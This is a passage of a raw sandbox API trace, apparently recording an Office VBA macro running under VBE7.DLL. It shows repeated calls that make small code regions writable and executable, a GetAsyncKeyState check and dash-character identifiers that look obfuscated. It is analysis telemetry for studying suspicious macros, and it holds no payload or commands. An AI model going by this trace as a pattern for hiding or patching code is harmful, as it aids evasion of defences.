_Dst=0xb754f48, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.925] memcpy (in: _Dst=0xb754f48, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.926] memcpy (in: _Dst=0xb754f48, _Src=0x197888, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6980ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0119.927] memcpy (in: _Dst=0xcb18eb8, _Src=0x197924, _Size=0x18 | out: _Dst=0xcb18eb8) returned 0xcb18eb8 [0119.927] CRetailMalloc_Realloc () returned 0xcb18da0 [0119.927] CRetailMalloc_Free () returned 0x1 [0119.927] GetCurrentProcess () returned 0xffffffff [0119.927] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0119.927] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.928] GetCurrentProcess () returned 0xffffffff [0119.928] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0119.928] GetCurrentProcess () returned 0xffffffff [0119.928] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0119.928] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.929] GetCurrentProcess () returned 0xffffffff [0119.929] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0119.929] GetCurrentProcess () returned 0xffffffff [0119.929] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0119.929] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.929] GetCurrentProcess () returned 0xffffffff [0119.929] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0119.930] GetCurrentProcess () returned 0xffffffff [0119.930] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0119.930] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.930] GetCurrentProcess () returned 0xffffffff [0119.930] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0119.930] GetCurrentProcess () returned 0xffffffff [0119.930] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0119.930] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.931] GetCurrentProcess () returned 0xffffffff [0119.931] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0119.931] GetCurrentProcess () returned 0xffffffff [0119.931] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0119.931] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.932] GetCurrentProcess () returned 0xffffffff [0119.932] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0119.932] GetCurrentProcess () returned 0xffffffff [0119.932] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0119.932] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.933] GetCurrentProcess () returned 0xffffffff [0119.933] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0119.933] GetCurrentProcess () returned 0xffffffff [0119.933] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0119.933] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.933] GetCurrentProcess () returned 0xffffffff [0119.933] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0119.933] GetCurrentProcess () returned 0xffffffff [0119.933] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0119.933] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.934] GetCurrentProcess () returned 0xffffffff [0119.934] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0119.934] GetCurrentProcess () returned 0xffffffff [0119.934] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0119.934] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.935] GetCurrentProcess () returned 0xffffffff [0119.935] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0119.935] GetCurrentProcess () returned 0xffffffff [0119.935] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0119.935] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.935] GetCurrentProcess () returned 0xffffffff [0119.935] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0119.936] GetCurrentProcess () returned 0xffffffff [0119.936] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0119.936] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.936] GetCurrentProcess () returned 0xffffffff [0119.936] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0119.936] GetCurrentProcess () returned 0xffffffff [0119.936] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0119.936] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.937] GetCurrentProcess () returned 0xffffffff [0119.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0119.937] GetCurrentProcess () returned 0xffffffff [0119.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0119.937] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.938] GetCurrentProcess () returned 0xffffffff [0119.938] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0119.938] GetCurrentProcess () returned 0xffffffff [0119.938] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0119.938] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.938] GetCurrentProcess () returned 0xffffffff [0119.938] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0119.938] GetCurrentProcess () returned 0xffffffff [0119.938] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0119.938] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.939] GetCurrentProcess () returned 0xffffffff [0119.939] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0119.939] GetCurrentProcess () returned 0xffffffff [0119.939] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0119.939] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.940] GetCurrentProcess () returned 0xffffffff [0119.940] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0119.940] GetCurrentProcess () returned 0xffffffff [0119.940] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0119.940] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.947] GetCurrentProcess () returned 0xffffffff [0119.947] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0119.947] GetCurrentProcess () returned 0xffffffff [0119.947] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0119.947] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.948] GetCurrentProcess () returned 0xffffffff [0119.948] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0119.948] GetCurrentProcess () returned 0xffffffff [0119.948] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0119.948] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.949] GetCurrentProcess () returned 0xffffffff [0119.949] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0119.949] GetCurrentProcess () returned 0xffffffff [0119.949] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0119.949] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.950] GetCurrentProcess () returned 0xffffffff [0119.950] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0119.950] GetCurrentProcess () returned 0xffffffff [0119.950] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0119.950] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.950] GetCurrentProcess () returned 0xffffffff [0119.950] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0119.950] GetCurrentProcess () returned 0xffffffff [0119.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0119.951] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.951] GetCurrentProcess () returned 0xffffffff [0119.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0119.951] GetCurrentProcess () returned 0xffffffff [0119.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0119.951] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.952] GetCurrentProcess () returned 0xffffffff [0119.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0119.952] GetCurrentProcess () returned 0xffffffff [0119.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0119.952] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.953] GetCurrentProcess () returned 0xffffffff [0119.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0119.953] GetCurrentProcess () returned 0xffffffff [0119.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0119.953] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.953] GetCurrentProcess () returned 0xffffffff [0119.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0119.953] GetCurrentProcess () returned 0xffffffff [0119.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0119.953] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.954] GetCurrentProcess () returned 0xffffffff [0119.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0119.954] GetCurrentProcess () returned 0xffffffff [0119.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0119.954] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.955] GetCurrentProcess () returned 0xffffffff [0119.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0119.955] GetCurrentProcess () returned 0xffffffff [0119.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0119.955] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.955] GetCurrentProcess () returned 0xffffffff [0119.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0119.955] GetCurrentProcess () returned 0xffffffff [0119.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0119.956] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.957] GetCurrentProcess () returned 0xffffffff [0119.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0119.957] GetCurrentProcess () returned 0xffffffff [0119.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0119.957] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0119.957] GetCurrentProcess () returned 0xffffffff [0119.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0119.959] GetAsyncKeyState (vKey=3) returned 0 [0119.959] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.959] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.959] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.959] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x1 [0119.960] CRetailMalloc_Alloc () returned 0xcb18f30 [0119.960] memcpy (in: _Dst=0xb754f48, _Src=0x197468, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.960] memcpy (in: _Dst=0xb755050, _Src=0x197484, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0119.960] memcpy (in: _Dst=0xb754f48, _Src=0x197468, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302f12, cbMultiByte=10, lpWideCharStr=0x197284, cchWideChar=11 | out: lpWideCharStr="GetObject") returned 10 [0119.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0452, cbMultiByte=10, lpWideCharStr=0x1972e4, cchWideChar=11 | out: lpWideCharStr="GetObject") returned 10 [0119.961] memcpy (in: _Dst=0xb754f48, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.961] memcpy (in: _Dst=0xb754f48, _Src=0x197468, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302f3a, cbMultiByte=30, lpWideCharStr=0x197284, cchWideChar=31 | out: lpWideCharStr="–——–––––——––——–––—–—––———––––") returned 30 [0119.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0416, cbMultiByte=30, lpWideCharStr=0x1972e4, cchWideChar=31 | out: lpWideCharStr="–——–––––——––——–––—–—––———––––") returned 30 [0119.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0416, cbMultiByte=30, lpWideCharStr=0x1972e4, cchWideChar=31 | out: lpWideCharStr="–——–––––——––——–––—–—––———––––") returned 30 [0119.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0416, cbMultiByte=30, lpWideCharStr=0x1972e4, cchWideChar=31 | out: lpWideCharStr="–——–––––——––——–––—–—––———––––") returned 30 [0119.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0416, cbMultiByte=30, lpWideCharStr=0x1972e4, cchWideChar=31 | out: lpWideCharStr="–——–––––——––——–––—–—––———––––") returned 30 [0119.962] CRetailMalloc_Alloc () returned 0xc844f70 [0119.962] _mbscpy_s (in: _Dst=0xc844f70, _DstSizeInBytes=0x1e, _Src=0x112c0416 | out: _Dst=0xc844f70) returned 0x0 [0119.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0d52, cbMultiByte=37, lpWideCharStr=0x1972f4, cchWideChar=38 | out: lpWideCharStr="_B_var_–——–––––——––——–––—–—––———––––") returned 37 [0119.963] _mbscpy_s (in: _Dst=0x19735c, _DstSizeInBytes=0x1e, _Src=0x112c0416 | out: _Dst=0x19735c) returned 0x0 [0119.963] CRetailMalloc_Free () returned 0x1 [0119.963] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0119.963] memcpy (in: _Dst=0xb754f48, _Src=0x197468, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.963] memcpy (in: _Dst=0xb754f4c, _Src=0x197468, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0119.963] memcpy (in: _Dst=0xb754f48, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.963] memcpy (in: _Dst=0xb754f48, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.963] memcpy (in: _Dst=0xb754f48, _Src=0x197468, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.964] memcpy (in: _Dst=0xb754f48, _Src=0x197468, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0119.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6980ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0119.964] memcpy (in: _Dst=0xcb18fb0, _Src=0x197504, _Size=0x18 | out: _Dst=0xcb18fb0) returned 0xcb18fb0 [0119.964] CRetailMalloc_Realloc () returned 0xcb18f30 [0119.964] CRetailMalloc_Free () returned 0x1 [0119.964] GetCurrentProcess () returned 0xffffffff [0119.964] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0119.964] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.965] GetCurrentProcess () returned 0xffffffff [0119.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0119.965] GetCurrentProcess () returned 0xffffffff [0119.965] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0119.965] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.966] GetCurrentProcess () returned 0xffffffff [0119.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0119.966] GetCurrentProcess () returned 0xffffffff [0119.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0119.966] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.966] GetCurrentProcess () returned 0xffffffff [0119.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0119.966] GetCurrentProcess () returned 0xffffffff [0119.966] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0119.966] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.967] GetCurrentProcess () returned 0xffffffff [0119.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0119.967] GetCurrentProcess () returned 0xffffffff [0119.967] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0119.967] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.968] GetCurrentProcess () returned 0xffffffff [0119.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0119.968] GetCurrentProcess () returned 0xffffffff [0119.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0119.968] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.968] GetCurrentProcess () returned 0xffffffff [0119.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0119.968] GetCurrentProcess () returned 0xffffffff [0119.968] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0119.969] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.969] GetCurrentProcess () returned 0xffffffff [0119.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0119.969] GetCurrentProcess () returned 0xffffffff [0119.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0119.969] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.970] GetCurrentProcess () returned 0xffffffff [0119.970] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0119.970] GetCurrentProcess () returned 0xffffffff [0119.970] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0119.970] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.970] GetCurrentProcess () returned 0xffffffff [0119.970] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0119.971] GetCurrentProcess () returned 0xffffffff [0119.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0119.971] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.971] GetCurrentProcess () returned 0xffffffff [0119.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0119.971] GetCurrentProcess () returned 0xffffffff [0119.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0119.971] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.972] GetCurrentProcess () returned 0xffffffff [0119.972] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0119.972] GetCurrentProcess () returned 0xffffffff [0119.972] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0119.972] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.973] GetCurrentProcess () returned 0xffffffff [0119.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0119.973] GetCurrentProcess () returned 0xffffffff [0119.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0119.973] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.974] GetCurrentProcess () returned 0xffffffff [0119.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0119.974] GetCurrentProcess () returned 0xffffffff [0119.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0119.974] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.974] GetCurrentProcess () returned 0xffffffff [0119.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0119.974] GetCurrentProcess () returned 0xffffffff [0119.974] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0119.974] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0119.975] GetCurrentProcess () returned 0xffffffff [0119.975] FlushInstructionCache 